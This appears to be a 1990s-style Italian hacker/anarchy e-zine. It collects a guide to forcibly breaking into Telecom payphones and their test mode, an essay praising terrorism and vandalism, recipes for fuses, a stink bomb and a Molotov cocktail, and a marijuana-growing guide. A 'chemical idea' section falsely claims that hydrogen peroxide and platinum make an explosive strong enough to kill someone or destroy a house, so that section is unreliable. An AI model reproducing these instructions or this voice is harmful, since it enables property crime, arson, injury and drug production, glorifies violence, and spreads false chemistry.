~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<################PIKKOLA GRANDE GUIDA AL PHREAKING###############<³¤|
|¤³>################################################################<³¤|


a cura di ~GoNe PoSt@L~


I Rotor
Il rotor non altro che il termine tecnico che indica le classiche cabine telefoniche arancioni.
In questa sezione vi spiegherò come sono strutturati i Rotor e come "assaltarli" per eventualmente
portarsi a casa un souvenir.Per quanto riguarda le cabine che accettano anche le monete, potete
mettere una croce sopra sul trucchetto della monetina col filo ( ormai 'sto trucco non lo usa più
nemmeno Cattìvik..., fate un po' voi).La moneta, infatti, finisce nel Rotor attraverso un "condotto"
che viene chiuso con una lama a ghigliottina.Inoltre il sistema di verifica delle monetine è veramente
complesso e impossibile ( o quasi ) da superare.Il sistema, infatti, si basa su tre tipi di controllo:
peso, dimensioni e materiale!!!. Perciò le monetine con lo scotch non funzionano più e nemmeno
quelle fatte passare sotto una macchina.In poche parole, non vi resta che farla pagare a quelli
della Telecom facendo una conoscenza approfondita dei loro Rotor.

Brutal assault
Premetto che quello che descriverò in seguito è ILLEGALE perciò vedete di prendere tutte le precauzioni possibili e cercate di trovare cabine in posti isolati, del tipo " come cacchio ci sono arrivato qui, chi mi da un GPS!!! ".Mi raccomando, portatevi anche un amico che faccia il "palo" e che magari vi copra durante l' operazione.
Prima di tutto dovete cercare un telefono che abbia una cabina intorno, non quelli coperti da quella specie di arco di PlexiglasS ( impaccia troppo i movimenti ).Se la luce nella cabina è accesa, bisogna immediatamente spegnerla con una semplice martellata, usando però un panno per attuttire il colpo e evitare che vi cadano in testa pezzi di vetro.L' unico modo per aprire il Rotor è quello di usare un "brutal assault", dato che per aprirlo con le buone maniere dovreste portarvene a casa uno e cercare di duplicare la chiave lavorando con una lima.Come vedrete, non ci sono fessure per infilare attrezzi ed oltrettutto la serratura del Rotor è semiconica e a prova di scalpello (provare per credere).Non ci resta che infilare lo scalpello nella piccola fessura laterale tra la parte grigia e quella arancione e dare dei colpi col martello dirigendoli verso l' esterno.In qusto modo aprirete la fessura quel tanto che basta per infilarci il vostro fido Piede di porco e rivelare l' interno del Rotor.Il lettore di schede, però è ancorato alla gabbia e per tirarlo fuori dovrete usare un cuneo, infilarlo dall' alto e sradicare il tutto.Se avete la possibilità di fare tutto ciò con calma, tanto meglio, sennò potete tornare la notte dopo per studiarvi l' aggeggio con l' aiuto delle tenebre.

Saltiamo la parte relativa alle specifiche tecniche dei Rotor, (dubito che possano interessarvi, in caso contrario fatemelo sapere e farò un articolo apposito) e passiamo alle procedure di Test con le quali si possono ottenere molte info interessanti.Premetto però che in questo caso è meglio non utilizzare il "brutal assault" ma cercare di duplicare la chiave con un tondino d' ottone modificato con una lima.

Procedura di Test dei Rotor modelli T.P.D.C. ( quelli a schede telefoniche )
tratto dal cookbook degli Spaghetti Phreakers ( a loro volta preso dal cookbook di AvAtAr666 )



T.P.D.C.
Posizionare l'unico microswitch verso l'alto.
Dare un comando di RESET al pulsante posto vicino al microswitch. Sul display viene visualizzato:

STATO DI TESTREL. nn.nn xx/xx/xx

(REL.......: identificazione release)

TEST 1: FONIA - SONERIA - BIP RICEVITORE - BOLLINI
Digitare 1 sulla tastiera di selezione, sul display compare TEST 01 lampeggiante. In questa fase TEST 01 lampeggiante si possono effettuare 4 test diversi e cioè:
1 - TEST FONIA: Confermare "1", sul display viene visualizzato TEST FONIA; verificare la fonia nel microtelefono che rimane attiva per circa 1 min. dopo di che viene visualizzato in seconda riga FINE TEST a conferma della chiusura del test fonia e subito dopo ricompare TEST 01 lampeggiante.
2 - TEST SONERIA: Digitare "2", sul display viene visualizzato TEST SONERIA; verificare, se è montata la soneria elettronica, che suoni; dopo circa 20 sec. viene visualizzato il seconda riga FINE TEST con la ricomparsa sul display di TEST 01 lampeggiante.
3 - TEST BEEP RICEVITORE: Digitare "3", sul display viene visualizzato TEST BEEP RICEVITORE; verificare il beep di avviso fine credito nel ricevitore che rimane attivo in modo intermittente per circa 20 sec. dopo di che viene visualizzato in seconda riga FINE TEST con la ricomparsa sul display di TEST 01 lampeggiante.

TEST 2: INTERFACCIA DI LINEA
Digitare "2" e verificare sul display la comparsa del messaggio TEST 02 I. LINEA seguito da EO in seconda riga.

TEST 3: PIASTRA LOGICA
Digitare "3" e verificare sul display la comparsa del messaggio TEST 03 P. LOGICA seguita da EO in seconda riga.

TEST 4: VISUALIZZAZIONE CONTATORI
Digitare "4" sul display compare TEST 04 CONTATORI e subito dopo verranno evidenziati in sequenza i contenuti dei contatori suddistinti per tipo (sulla sinistra del display), e la quantità (sulla destra) espresse da numeri di max. 4 cifre che nel seguito saranno indicati con "xxxx" cioè:
CONT NICD xxxx = numeri incassi carta telefonica
CONT NRCD xxxx = numeri riscontri carta telefonica
CONT NICC xxxx = numeri incassi carta di credito
VALORE SCATTO 200 = costo del gettone
Al termine, sul display in seconda riga comparirà il messaggio FINE TEST.

TEST 5: DISPLAY
Digitare "5" e verificare sul display la scritta TEST 05 DISPLAY e subito dopo la comparsa di tutti i numeri su due righe da 0 a 9; al termine comparirà in seconda riga il messaggio FINE TEST.

TEST 6: MOTORE - ATTUATORE SARACINESCA
Digitare "6" e verificare sia la movimentazione del tamburo che quella della saracinesca. Sul display TEST 06 MEC. LET. e subito dopo LETTORE INTEGRATO e al termine in seconda riga FINE TEST.

TEST 7: LETTURA DELLE SCHEDE - BUZZER - LED
Digitare "7". Sul display compare il messaggio LETTORE INEGRATO e subito dopo INSERIRE UNA CARTA; introdurre una carta telefonica non esaurita; la carta sarà trattenuta e poi restituita; sul display comparirà il messaggio CARTA TELEFONICA e subito dopo RITIRARE LA CARTA; si attiverà il buzzer per alcuni istanti. Passare una carta di credito; sul display comparirà CREDITO TELEFONICO se la carta è Telecom, CREDITO COMMERCIALE se commerciale, per poi ritornare sul display INSERIRE UNA CARTA. L'uscita da questo test avviene o digitando un tasto della tastiera o per time-out di 40 sec., visualizzando il messaggio FINE TEST in seconda riga.
NOTA: Una carta telefonica con valore viene restituita dalla bocchetta superiore, mentre una carta telefonica azzerata viene restituita dalla bocchetta inferiore.

TEST 8: VISUALIZZAZIONE SEQUENZIALE DEI CODICI DI ERRORE
Digitare "8". Se successivamente all'ultimo TEST 8 visualizzato non vi è stato un errore che abbia determinato un F.S., eventuali codici diagnostici presenti nello storico vengono visualizzati sul display come di seguito:
In prima riga: ERRORI STORICI
In seconda riga: E11 oppure E12, ecc.
Se vi è stato un F.S. anche se autoripristinante sul display viene visualizzata una sequenza formata dal codice di errore che ha determinato il F.S. più eventuali codici diagnostici presenti nello storico. Più volte l'apparecchio è andato in F.S. più sequenze saranno visualizzate come di seguito:
In prima riga: SEQUENZA N.01
In seconda riga: CODICE E10 oppure Exx
L'avanzamento dei codici/sequenza avviene manualmente digitando un qualsiasi tasto della tastiera. A fine sequenze gli eventuali codici diagnostici presenti nello storico vengono visualizzati come descritto nella prima parte ma in modo automatico. Successivamente sul display vengono visualizzati in modo automatico i contatori statistici relativi al lettore integrato, distinti per tipo (sulla sinistra), e per quantità (sulla destra) espresse da numeri max di 4 cifre che nel seguito saranno indicati con "xxxx" e cioè:
In prima riga: CONTATORI LETTORE
In seconda riga: CONT FRODE GON xxxx: contatore frode gancio ON
CONT FRODE GOFF xxxx: contatore frode gancio OFF
CONT ERR LETT2 xxxx: contatore errore lettura T2
CONT INCAGLIO xxxx: contatore incaglio scheda
CONT CANCEL OK xxxx: contatore scheda OK
CONT CANCEL KO xxxx: contatore scheda KO
Termina con TEST 08 SEQUENZE e in seconda riga FINE TEST. Questo test può essere ripetuto indefinitivamente senza uscire dallo stato di test. All'uscita da quest'ultimo sia per reset che per time-out di 40 sec. di inattività, viene azzerata la memoria dello storico sequenziale dei codici di errore, mentre i contatori statistici relativi al lettore integrato vengono azzerati solo superando la soglia di 9999. L'uscita da qualsiasi test per reset o per time-out che non abbia interessato il TEST 8, non determina l'azzeramento della memoria dello storico sequenziale dei codici degli errori.

TEST 9: RESET DEL LETTORE INTEGRATO
Digitare "9". Sul display comparirà TEST 09 RESET LET.
Subito dopo viene visualizzato:
In prima riga: LETTORE INTEGRATO
In seconda riga: REL nn.nn gg/mm/aa
(REL....... = identificazione della release software)
Subito dopo sul display comparirà FINE TEST.
Questo test consente di mandare un reset al lettore integrato.

TEST 10: VERIFICA INTERRUTTORE SPORTELLO
Digitare "0". Sul display comparirà TEST 10 SPORTELLO e subito dopo in seconda riga lo stato dell'interruttore relativo allo sportello e cioè:
SPORTELLO APERTO
SPORTELLO CHIUSO
Per verificare il buon funzionamento dell'interruttore bisogna controllare la coerenza tra il messaggio sul display e lo stato dello sportello. Per uscire dal test premere un tasto qualsiasi; sul display in seconda riga comparirà il messaggio FINE TEST.



TEST 11: INDICE DEI CODICI DI ERRORE
Digitare "*". Sul display comparirà TEST 11 INDICE. In modo automatico e/o manuale pigiando un
tasto saranno visualizzati in ordine crescente tutti i codici di errore in seconda riga, con
la relativa descrizione sulla prima riga.

TEST 12: AZZERAMENTO CONTATORI
Digitare "#". Sul display comparirà TEST 12 AZZ.CONT. lampeggiante. Se si vogliono azzerare i
contatori bisogna confermare l'operazione digitando nuovamente il tasto "#". Premendo un qualsiasi altro tasto si esce dal test senza azzerare i contatori. Sul display in seconda riga comparirà FINE TEST.

FINE TEST
Se durante l'effettuazione della procedura di test fossero riscontrate delle anomalie esse
saranno evidenziate con il relativo codice di errore. Se l'esito del test è positivo, l'apparecchio è pronto per entrare in servizio; pertanto si riporta il microswitch verso il basso (normale funzionamento) e si preme nuovamente il pulsante di reset.



Nel prossimo articolo vi parlerò dell' MTF Project, ovvero il sogno di ricaricare le schede telefoniche della Telecom...



³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³ ¿ ¿ ¿ ¿ ¿¿¿ ¿¿¿ ¿ ¿ ¿ ¿ ³³³³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³ ¿ ¿ ¿¿ ¿ ¿ ¿ ¿ ¿ ¿ ¿ ¿ ¿ ³³³³³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³ ¿¿¿ ¿ ¿¿ ¿¿¿ ¿¿ ¿ ¿¿¿¿ ¿ ³³³³³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³ ¿ ¿ ¿ ¿ ¿ ¿ ¿ ¿ ¿¿¿ ¿ ¿ ¿ ³³³³³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³


|¤³>################################################################<³¤|
|¤³<##############################ANARCHIA##########################<³¤|
|¤³>################################################################<³¤|



Che cos'e' l'anarchia? Principalmente, l'Anarchia e' la credenza che
non dovrebbe esserci nessuno a governare le
persone (il che include insegnanti, politici,
eccetera)

Perche' dovrebbe Credere nell'anarchia e' credere in se stessi.
piacermi l'Anarchia? E' sapere di essere indipendente, di non aver
bisogno di nessuno che ti dica cosa fare.

Come posso diventare Diventare Anarchico/a e' facile. Tutto quello
un anarchico/a? che devi fare e' opporti a tutte le forme di
governo. Questo puo' includere, ad esempio, il
terrorismo, ma anche il semplice vandalismo o
la disubbidienza a qualsiasi comando non ti
piaccia.

Non devi per forza dirottare un aereo o fare un'attentato per essere
Anarchico, ma devi avere le palle di farlo. Puoi limitarti, se vuoi,
al vandalismo o alla vita fuorilegge senza esagerare (fare il pirata,
farti le canne...). Se vuoi andare oltre, questa sezione e' una fonte
pressoche' inesauribile di idee. Potresti cominciare ad appassionarti
agli esplosivi, come e' successo a me, o all'hacking, o allo skamming
(arte di procurarsi cose gratis, Lupin III in pratica). L'importante e'
che tu ci creda.

The Raven


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<##################Costruire diversi tipi di micce###############<³¤|
|¤³>################################################################<³¤|


Auotore/traduttore: Cookbooker :o)

-Miccia lenta

Avrete bisogno di:
-Clorato o nitrato (non nitrito e neanche latrato :op) di potassio;
-zucchero granuloso;
-cotone a mo di spago, o lacci delle scarpe;

Procedura:
-immergere i lacci (o il cotone) in acqua calda insaponata, dopo di
che dovrete sciaquarli con acqua fredda;
-mescolate in una bacinella: 1 parte di clorato (o nitrato) di potassio,
1 parte di zucchero e 2 di acqua;
- immergete in questa soluzione i lacci
o il cotone;
-Lasciate asciugare;

-Miccia veloce

Avrete bisogno di:
-Cotone;
-polvere da sparo (svuotate qualche raudo o mega, insomma uqalche petardo);

Procedura:
-Inumidite leggermente la polvere da sparo, facendola cosi' diventare una
pasta;
-spalmate la "pasta" sul cotone;
eccovi la vostra miccia veloce.

Tradutto dal buon vecchio Cookbook di Jolly Roger.

by C00KB00K3R.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<#########################ideuzza chimica########################<³¤|
|¤³>################################################################<³¤|


Occorrente:
Perossido d'idrogeno
Platino

Appena il platino entra in contatto con il perossido d'idrogeno, genera
una reazione, che riempie 700.000 volte il volume originale (del P.d.I)
con gas. All'istante! E' 700 volte piu' potente della nitroglicerina,
percio' e' mortale: bambini non fatelo a casa... Ma se lo facessimo
fare a qualcun altro... Chesso', ad esempio mettendo in equilibrio
instabile un contenitore col P.d.I. in modo che cada sul platino.
Non c'e' bisogno di alcun contenitore stavolta, il gas stesso creera'
un'onda d'urto abnorme con l'aria. Mmmhhh mi piace... L'unico
inconveniente e' che il platino costa molto... Io penso che per un'
esplosione non troppo esigente (che uccide solo una persona) bastino
10 cl di PdI, non ho idea delle proporzioni col platino, credo che
3-5 gr dovrebbero bastare: l'oro costa circa 20mila al gr, il platino
qualcosa in piu'... Se poi volete far saltare una casa, un camion, o
un grattacielo, non vorrete cavarvela con 80mila lire vero? Facciamo
un litro di perossido d'idrogeno (hei dopo la reazione sono
settecentomila litri... avete idea delle proporzioni?) e 50 gr di
platino. Viene a costare non meno di un milione e mezzo, ma volete
mettere la soddisfazione di far saltare una casa? Pensate che, se non
morite, passerete i migliori anni della vostra vita in carcere...
Pensate che bello!!

The Raven


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<###########################STINK BOMB###########################<³¤|
|¤³>################################################################<³¤|


STINK BOMB ossia "bombe puzzolenti"

Quando mi sono akkorto di aver messo questo artikolo nella sezione Anarchy mi sono messo a ridere...


Ormai tutti sanno kome fare queste bombe puzzolenti... ma nel kaso ke kualkuno non ne sia a
konoscenza alla fine di kuesto "artikolo" anke lui le saprà fare.
Per fare queste semplici e simpatiche (solo a voi ;) bombe vi basta dello zolfo, dell'ammoniaca
ed un contenitore. Prendete il vostro bel contenitore, metteteci dell'ammoniaca ed aggiungeteci
dello zolfo (ne bastano pikkole quantità...), agitate bene il tutto, mirate, lanciate e skappate! ;o)

Alla prox, Cookbooker.




|¤³>################################################################<³¤|
|¤³<########################La bomba Molotov########################<³¤|
|¤³>################################################################<³¤|


La cosiddetta 'bomba Molotov' e' un'arma molto comune e semplicissima
da fare. Sprigiona una fiammata e puo' fare mooolto male.
Avete bisogno di:
- Una bottiglia vuota
- Uno straccio vecchio
- Miscela (per motorini)

Riempi la bottiglia per 3/4 (anche meno, ma Fate Vobis) con la miscela.
Inzuppa leggermente lo straccio ed inseriscilo nella bottiglia, in modo
che sia ben immerso nel liquido. Bueno, ora accendi la miccia e
lanciala su qualcosa di solido!

The Raven


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³³³³³³³³#³³#³³#³³###³³###³³³##³³####³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³³³³³³³³##³#³# #³#³#³#³³³³³# #³###³³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³³³³³³³³#³##³###³##³³#³³³³³# #³³³³#³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³³³³³³³³#³³#³#³#³#³#³³###³³³##³³####³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


N.D. Cookbooker: premetto ke ero indeciso se inserire questa sezione, io personalmente sono kontro l'assunzione di ogni tipo di narKotiKo (al massimo mi faccio un'aspirina... ;o), ma infine ho deciso di inserirla per offrire ai lettori una vasta quantità di argomenti e per akkontentare quei 4 tossici che ci leggono, enjoy! ;o)



|¤³>################################################################<³¤|
|¤³<##########################Hoi Marjia!###########################<³¤|
|¤³>################################################################<³¤|


La marijuana. Come coltivarla all'aperto e al chiuso.


PREMESSA: Io non fumo marijuana, ho trovato questo testo su internet
e l'ho tradotto per voi che fumate, ma non voglio incoraggiare nessuno
a farlo col presente. L'ho incluso perche' era giusto farlo. Enjoy!

La Marijuana e' una pianta che cresce spontaneamente. La sezione
fibrosa di essa usata per fare il fumo. Le foglie, i fiori, e le
resine di questa sono usate per "sballarsi". Normalmente, le parti
verdi della pianta sono fumate per produrre i suoi noti effetti, ma
possono anche essere mangiate. L'ingrediente attivo della marijuana e'
il THC (tetaidrocannabinolo). La maria contiene dall'1 al 4% di THC (4%
e' roba buona). La maria cresce selvaggia in molte parti del mondo, ed
e' coltivata in Messico, Vietnam, Africa, Nepal, India, Sud America,
etc.,etc. Molti ne coltivano piante in casa. Molta viene dal Messico,
un po' da Panama, Sud America e Africa. L'hashis e' la resina della
pianta della maria, mischiata alle parti piu' alte della pianta. La
ganja consiste nelle parti piu' alte delle piante migliori, ma e'
anche il nome dato ad un tipo particolare di maria jamaicana.
La maria si deteriora in un paio d'anni se esposta alla luce, all'aria
o al caldo. Dovrebbe sempre essere conservata in posti freddi.

COME COLTIVARLA ALL'APERTO
Per evitare i prezzi alti, ecco la soluzione migliore: coltivatela
in casa! Contrariamente ai luoghi comuni, la maria cresce bene in molti
posti. Cresce bene se la temperatura non supera i 75 gradi FARENHEIT
(dovrebbero essere circa 15 gradi C, ma non ho modo di controllare ora)
La pianta richiede almeno 8 ore di luce solare al giorno e dovrebbe
essere piantata in aprile/maggio ma ASSOLUTAMENTE dopo gli ultimi
freddi dell'anno. All'aperto, la coltivazione e' il miglior metodo,
perche' l'erba sembra crescere meglio senza piu' attenzioni di quante
ne richiede nel suo ambiente naturale. Certo, all'aperto servono
precauzioni non necessarie al chiuso, devi nasconderla sia dalle forze
dell'ordine (ma quand'e' che la legalizzeranno?) che dai civili,
anche perche' questi ultimi potrebbero rubartela. Devi anche avere
accesso all'area per preparare il terreno e raccogliere le piante.
Ci sono due scuole di pensiero su come cominciare la semina. Una dice
che devi cominciarla per una decina di giorni al chiuso in una scatola
(vedi la sezione al chiuso). L'altra e' che devi cominciare
direttamente nel posto dove hai intenzione di coltivarla. Con questo
metodo crescono meno piante ma ne muoiono meno nel trapianto. La terra
dovrebbe essere preparata rigirandola molte volte e aggiungendo un
bicchiere di calce viva con acqua (? trad. lett. di one cup of hydrated
lime per square yard of soil) per yarda quadrata (c.a. mezzo
metro -come sopra) e un po' d'acqua e fertilizzante. La terra ora
dovrebbe essere bagnata per molte volte e poi lasciata al sole una
settimana. Le piante dovrebbero essere piantate al massimo 90 cm
lontane l'una dall'altra. Dovrebbero essere innaffiate ogni
tanto ma NON troppo. Soprattutto attorno alle radici, troppa acqua
manda il tutto a puttane. L'erba cresce bene con il granturco e il
luppolo, che la nasconderanno, non altrettanto con spinaci o
peperoncino.

INFORMAZIONI GENERALI SULLA COLTIVAZIONE
Sia la pianta maschio che femmina producono THC, ma il maschio di meno.
In una buona coltivazione, il maschio sara' comunque fumabile. La
maria puo' raggiungere un'altezza di 6 metri (!) e un diametro di 10 cm
Normalmente si avranno il 50% di maschi e altrettanti di femmine, ma
cio' puo' essere cambiato in diversi midi. La pianta maschio muore
nella 12ma settimana di crescita, la femmina vive altre 3-5 settimane
per produrre i semi. La terra di maria dovrebbe essere compatta quando
la strizzi, ma dovrebbe anche rompersi con una piccola pressione e
assorbire bene l'acqua. Un bel test per il chiuso e l'aperto e' di
aggiungere vermi alla terra, se vivono e crescono e' buona terra, se no
e' da cambiare. I vermi aiuteranno anche la pianta a crescere.

SEMI
Per avere buona erba, dovresti cominciare con buoni semi. Un buon punto
di partenza e' conservare i semi delle migliori piante che hai fumato.
I semi dovrebbero essere verdi e apparire sani, lisci. Una prova
efficace e' di lasciarli su una pentola a friggere. Se fanno "CRACK"
probabilmente sono buoni. Dovrebbero essere conservati in acqua
distillata di notte prima di essere piantati. ASSICURATI di piantarli
con la punta in ALTO. Piantali a circa 4-5 cm di profondita'.
Dovrebbero spuntare le piantine in cinque giorni.

GERMOGLIAMENTO
Il miglior modo per farla germogliare e' di fare una scatola con un
fondo bucato o usare bicchieri di carta a mo' di vasi bucati sul fondo.
La terra deve essere un misto di humus, terra e sabbia con
fertilizzanti organici e acqua. Mantenere cosi' per 7 giorni prima di
piantarla. Quanto e' pronta al trapianto, devi assicurarti di lasciare
una palla di terra attorno alle radici di ogni pianta. Questa palla
deve essere grossa come una da tennis, e messa sotto terra (quella di
coltura). Se stai coltivando o trapiantando al chiuso, dovresti usare
una luce verde durante l'operazione. Se lo stai facendo all'aperto,
dovresti farlo circa due ore prima del tramonto. Dopo che le piante
saranno trapiantate, devi annaffiarle. Potresti anche usare i composti
chimici commerciali per i trapianti.

COLTIVAZIONE AL CHIUSO
La coltivazione al chiuso ha molti vantaggi, oltre il fatto che e'
molto piu' difficile che te la trovino, puoi controllare le condizioni
dell'ambiente come vuoi. Le piante cresciute al chiuso non somigliano
alle loro simili all'aperto. Saranno piu' scarne e magari piu' flosce,
ma CONTENGONO PIU' RESINA! Se le coltivi in una stanza, dovresti
mettere carta incatramata sul pavimento e comprare pacchi di terreno
sterilizzato. Te ne servira' 9 dm^2 per ogni pianta. Le piante hanno
bisogno di 150 ml di acqua a settimana (per ciascuna pianta), aria
fresca e SENZA FUMO DI TABACCO. Almeno 8 ore di luce al giorno sono
necessarie. Piu' luce ci sara' e piu' le piante cresceranno in fretta
e ci saranno piu' femmine che maschi. 16 ore di luce al giorno sono
l'ideale. Sarebbe buona cosa fare un'ora di luce durante la notte, si
ottengono piu' femmine. I muri dovrebbero essere bianchi o coperti di
fogli di alluminio per riflettere la luce. Le luci possono essere a
bulbo o fluorescenti. 75 W (o 60 cm di lampada fluorescente) per
pianta vanno bene. Le lampade fluorescenti sono le migliori, tranne
quelle bianche fredde. Le fonti di luce dovrebbero essere a circa 50 cm
ma non meno di 35. Vanno montate su un rack e mosse quasi ogni giorno
seguendo la crescita.

RACCOLTA E TRATTAMENTO
Le piante maschio saranno piu' alte e avranno circa 5 sepali gialli o
verdi che si separeranno per impollinare la femmina. La femmina e' piu'
corta e ha un piccolo fiore con pistillo, che non sembra un fiore vero
e proprio. Se non vuoi semi ma solo buona roba, devi prendere i maschi
prima che impollinino le femmine, perche' queste ultime usano parte
della resina per fare semi. Dopo altre 3-5 settimane, dopo che hai
tolto i maschi, le femmine cominceranno a morire (di solitudine?),
questo e' il momento di raccogliere. Alcuni contadini hanno messo i
loro favi vicino a piantagioni di maria. Le api prendono il polline per
il loro miele, che dovrebbe contenere THC. Il miele e' quindi un ottimo
contenitore di THC. Se vuoi semi lascia i maschi fare il loro dovere e
poi raccoglili. Un mese dopo raccogli anche le femmine. Per trattare le
piante, devono essere asciugate. Sulle grosse coltivazioni, cio' si
fa con apposite stanze. Devi avere una sorgente di calore capace di
sviluppare nella scatola (o nella stanza) circa 130° FARENHEIT (penso
sui 40°C, ma controlla). La stanza/scatola deve essere ventilata con
aria fresca e non si deve accumulare vapore. Deve esserci uno schermo
tra le foglie e la fonte di calore. Per quantita' piu' piccole si puo'
tagliare la pianta a livello del terreno e metterla in un vestito per
non perdere foglie. Prendi i semi con le mani e conservali. Metti tutte
le foglie su un foglio di alluminio e mettile su uno scaldino, appena
cominciano a fare fumo spegni lo scaldino e levale dopo dieci secondi.

TRUCCHI
Ci sono diversi trucchi per aumentare il numero di femmine o la
quantita' di THC:
Puoi far maturare le piante in 36 giorni se hai fretta dando 14 ore di
luce, ma non saranno grosse.
Puoi accorciare gradualmente il ciclo di luce fino ad arrivare a 14 ore
Puoi smettere di innaffiare le piante appena la resina comincia a
raggiungere i fiori. Questo aumentera' un po' la resina.
Puoi usare una lampada solare UVA appena comincia a spuntare il gambo
dei fiori.
Puoi tagliare il fiore, nel punto in cui incontra la pianta, e si
formera' un nuovo fiore. Questo puo' essere ripetuto 2-3 volte per
avere piu' fiori del solito.
Se sara' spruzzata con "Ethrel" presto nello stadio di crescita, ci
saranno solo piante femmine che cresceranno molto in fretta.
Puoi aumentare la crescita con un composto chiamato COLCHICINA. E'
difficile da avere e costoso. Uso: prepara una soluzione di acqua
distillata con lo 0.10% di colchicina. Questo fara' morire molti
semi, ma quelli sopravvissuti daranno piante poliploidi. E otterrai
erba semplicemente FAVOLOSA. Il problema e' che la colchicina e un
veleno in grosse quantita' e puo' avvelenare la prima generazione di
piante. Maggiori dettagli nel libro CONNOISSEUR'S HANDBOOK OF MARIJUANA
do Bill Frake.
ANCORA IN SPERIMENTAZIONE: Taglia le foglie appena spuntano: ne
cresceranno altre, ma storte, la pianta non sembrera' maria, ci saranno
meno sostanze ma ci sara' resina cristallizata in hashish forte su
tutta la superficie della pianta.

PROBLEMI E SOLUZIONI
Presta sempre attenzione alle condizioni ambientali: terra a 7 pH o
meno, acqua buona, luce, aria fresca, e niente pozze d'acqua.
SINTOMI PROBLEMA E CURA

Le foglie grandi diventano gialle Mancanza di nitrogeno - aggiungi
e le piccole restano verdi. nitrato di soda o fertilizzante
organico.

Le foglie piu' vecchie sono Mancanza di fosforo - aggiungi
frastagliate ai bordi, diventano fosfato commerciale.
nere o viola.

Le foglie mature lasciano una Mancanza di magnesio - aggiungi
sostanza gialla. fertilizzante con magnesio.

Le foglie mature diventano gialle Mancanza di potassio - aggiungi
con aree grige. potassio

Cracked stems, no healthy support Boron dificiency - add
issue. any plant food containing
boron.

Foglie piccole con vene gialle. Mancanza di zinco - compra zinco.

Le foglie giovani diventano storte Mancanza di mobildenio - usa cibo
o gialle. con un pizzico di mobildenio.

SEZIONE EXTRA: BUON/CATTIVO FUMO
E' possibile migliorare la qualita' della roba. Ecco come:
1. Metti la roba in un contenitore che permette all'aria di entrare e
metti un po' di ghiaccio secco, poi metti il tutto in un congelatore
per pochi giorni. Questo aggiunge un po' di potenza al prodotto, ma
funziona solo con ghiaccio secco.
2. Prendi un po' d'erba e inumidiscila, mettila in una valigetta o
zainetto e metti quest'ultimo in un posto buio e umido per molte
settimane.
3. Esponi l'erba a una lampada solare ad alta intensita' per un giorno
intero.
4. Prendi la roba inutile che ti e' rimasta (terra, gambi, vermi...)
e mettila in un vaso coperto, con abbastanza alcool da coprire tutto.
Ora bolli attentamente la mistura in un microonde. NON USARE GAS! Dopo
45 minuti di calore, leva la roba solida e conserva l'alcool. Ripeti
il procedimento con i residui, combina le due parti d'alcool, che
conterra' il THC timasto.

-= Fonte: The Anarchist Cookbook, 1992 by Exodus =-

The Raven


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³³³³³³³#³³³³³#³#³³³#³³#³³#³³#³#³³³³³³³³³³³³³³³³³³³³³³³³³
